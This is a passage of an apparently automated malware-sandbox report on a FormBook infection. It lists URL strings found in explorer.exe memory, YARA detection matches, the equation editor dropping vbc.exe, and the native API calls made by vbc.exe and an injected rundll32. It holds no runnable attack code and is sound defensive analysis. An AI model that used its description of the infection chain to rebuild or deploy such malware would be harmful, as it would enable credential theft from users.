      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2192785429.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004181C0 NtCreateFile,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00418270 NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004182F0 NtClose,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004183A0 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004181BF NtCreateFile,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041826B NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00418212 NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004182EA NtClose,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041831A NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041839A NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041841A NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C600C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C60048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C60078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C607AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C610D0 NtOpenProcessToken,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C60060 NtQuerySection,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C601D4 NtSetValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C61148 NtOpenThread,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6010C NtOpenDirectoryObject,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C5F8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E07AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFAB8 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0060 NtQuerySection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0078 NtResumeThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E10D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E1148 NtOpenThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E01D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DF938 NtWriteFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E1930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E0C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024DFD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024E1D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B81C0 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B8270 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B82F0 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B83A0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B81BF NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B8212 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B826B NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B82EA NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B831A NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B839A NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B841A NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0027BF7F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00401030
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B973
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041C1FB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00408C5B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00408C60
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041BC66
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D87
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00402D90
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041C75F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00402FB0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6E0C6
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C73040
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C8905A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C9D005
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6E2E9
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D11238
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6F3CF
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C963DB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C77353
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CBA37B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C72305
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C81489
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CA5485
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CAD47D
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C8C5F0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7351F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7E6C1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C74680
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D12622
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CA57C3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CF579A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7C7BC
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D0F8EE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7C85C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C9286D
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C869FE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D1098E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02591238
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EE2E9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F7353
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0253A37B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F2305
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EF3CF
